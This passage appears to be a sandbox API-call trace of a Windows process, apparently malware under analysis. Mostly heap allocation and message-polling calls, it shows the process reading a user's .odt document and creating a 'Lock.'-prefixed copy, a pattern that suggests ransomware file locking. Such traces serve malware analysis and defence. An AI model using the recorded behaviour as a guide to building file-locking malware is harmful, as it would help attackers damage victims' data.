dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0262.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0262.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0262.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0262.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0262.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0262.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0262.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0262.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0262.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0262.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0262.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0262.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0262.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0262.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0262.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0262.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0262.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0262.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0262.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0262.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0262.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.209] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0262.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0262.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0262.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0262.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0262.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0262.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0262.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0262.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0262.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0262.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0262.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0262.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0262.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0262.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0262.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0262.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0262.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0262.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0262.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0262.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0262.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0262.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0262.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0262.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0262.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0262.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0262.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0262.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0262.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0262.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0262.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0262.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0262.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0262.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0262.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0262.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0262.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0262.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0262.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0262.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0262.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0262.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0262.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0262.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0262.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0262.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0262.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0262.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0262.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0262.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0262.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0262.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0262.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0262.213] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0262.213] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.213] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.213] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0262.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0262.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0262.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0262.214] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/EJnozy8q_wA_6u.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ejnozy8q_wa_6u.odt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0262.214] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0262.215] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0262.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0262.215] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0262.215] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.215] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0262.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0262.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0262.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0262.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0262.215] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/Lock.EJnozy8q_wA_6u.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lock.ejnozy8q_wa_6u.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0262.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0262.216] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0262.216] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.217] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0262.217] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0262.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0262.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0262.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0262.217] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0262.217] ReadFile (in: hFile=0x268, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x8e1e, lpOverlapped=0x0) returned 1 [0262.221] ReadFile (in: hFile=0x268, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0262.222] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0262.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0262.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0262.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0262.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0262.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8e1e) returned 0x3571018 [0262.222] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0262.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0262.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0262.222] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0262.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0262.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0262.222] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0262.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0262.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0262.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2058 [0262.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0262.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0262.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0262.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8e1e) returned 0x3571018 [0262.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0262.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16e8 [0262.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0262.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0262.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18b8 [0262.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0262.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1778 [0262.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0262.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0262.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d38 [0262.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0262.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0262.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0262.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0262.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0262.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0262.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8e1e) returned 0x24c0870 [0262.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0262.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0262.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0262.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0262.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0262.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0262.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0262.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0262.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0262.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0262.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0262.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0262.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0262.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0262.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0262.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0262.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0262.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0262.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0262.225] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0262.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0262.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0262.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0262.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.225] RtlAllocateHeap 